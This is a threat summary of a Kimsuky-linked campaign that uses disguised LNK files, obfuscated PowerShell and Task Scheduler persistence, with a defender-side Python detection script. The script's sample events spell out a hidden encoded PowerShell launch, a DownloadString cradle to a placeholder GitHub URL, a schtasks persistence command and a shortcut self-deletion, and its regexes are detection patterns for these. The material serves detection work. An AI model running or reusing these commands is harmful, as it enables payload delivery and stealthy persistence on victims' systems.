Attackers distributed malicious Windows shortcut (.LNK) files disguised as privacy consent forms and other work-related documents, tricking users into launching obfuscated PowerShell that fetched additional payloads from external infrastructure. Reporting indicates GitHub was used as a covert stage in the infection chain, helping operators blend malicious downloads and command retrieval into legitimate web traffic while keeping much of the activity fileless and in memory.
Once executed, the malware created downloader and loader scripts, established persistence through Windows Task Scheduler, opened decoy documents to reduce suspicion, and deleted the original shortcut to limit forensic artifacts. Observed follow-on payloads included an information stealer and a backdoor loader that decrypted and loaded malware into memory; the theft activity gathered host, security product, network, IP, drive, file, and process data, with behavior resembling prior Kimsuky-linked operations.
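As an added defender-side illustration (not code from the ASEC or Infosecurity Magazine reporting), the script below runs simple detection heuristics for the chain described above, from shortcut-launched hidden PowerShell through download cradle, Task Scheduler persistence and shortcut self-deletion, over constructed Sysmon-style process-creation events. Field names, file paths, the task name and the sample URL are assumptions, not indicators from the campaign.

```python
"""Heuristics for the LNK -> PowerShell -> schtasks chain, applied to
constructed process-creation events (Sysmon Event ID 1 style fields)."""
import re

# Switches typical of hidden/obfuscated PowerShell launched from a shortcut.
HIDDEN_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop|noprofile|enc(?:odedcommand)?\s|ep\s+bypass)", re.I)
DOWNLOAD = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|https?://)", re.I)
SHELL_PARENTS = ("explorer.exe", "cmd.exe")  # a double-clicked .lnk starts here
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  # assumed path

def classify(event):
    """Return the rule names an event matches (empty list = nothing fired)."""
    hits, cmd = [], event["CommandLine"]
    image, parent = event["Image"].lower(), event["ParentImage"].lower()
    if image.endswith("powershell.exe") and parent.endswith(SHELL_PARENTS) \
            and HIDDEN_FLAGS.search(cmd):
        hits.append("lnk_like_hidden_powershell")
    if image.endswith("powershell.exe") and DOWNLOAD.search(cmd):
        hits.append("powershell_download_cradle")
    if image.endswith("schtasks.exe") and re.search(r"/create\b", cmd, re.I) \
            and re.search(r"powershell", cmd, re.I):
        hits.append("schtasks_powershell_persistence")
    if parent.endswith("powershell.exe") and image.endswith("cmd.exe") \
            and re.search(r"\bdel\b.*\.lnk", cmd, re.I):
        hits.append("lnk_self_delete")
    return hits

def triage(events):
    """Map the index of every event that fired to its rule hits."""
    result = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            result[i] = hits
    return result

# Constructed sample telemetry; values are made up for the demonstration.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgA..."},
    {"ParentImage": PS, "Image": PS, "CommandLine": "powershell -c \"(New-Object Net.WebClient)"
     ".DownloadString('https://raw.githubusercontent.com/EXAMPLE/repo/main/s.txt')\""},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /create /sc minute /mo 30 /tn Update "
     "/tr \"powershell -w hidden -File C:\\Users\\Public\\ld.ps1\""},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c del /q \"C:\\Users\\u\\Desktop\\consent_form.lnk\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]
```

Running `triage(SAMPLE_EVENTS)` flags the first four events and leaves the benign notepad launch alone; in practice the same rules would be fed from a SIEM query rather than an inline list.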

AhnLab ASEC published analysis of a malware campaign using Windows shortcut files disguised as privacy consent forms and other work-related documents. The LNK files executed obfuscated PowerShell, downloaded additional payloads filelessly, established persistence via Task Scheduler, and in some cases deployed information-stealing and backdoor components linked by behavior to prior Kimsuky activity.
Infosecurity Magazine reported on a multi-stage malware campaign that used GitHub as a covert channel for malware delivery and control.
Sources:
- asec.ahnlab.com
- infosecurity-magazine.com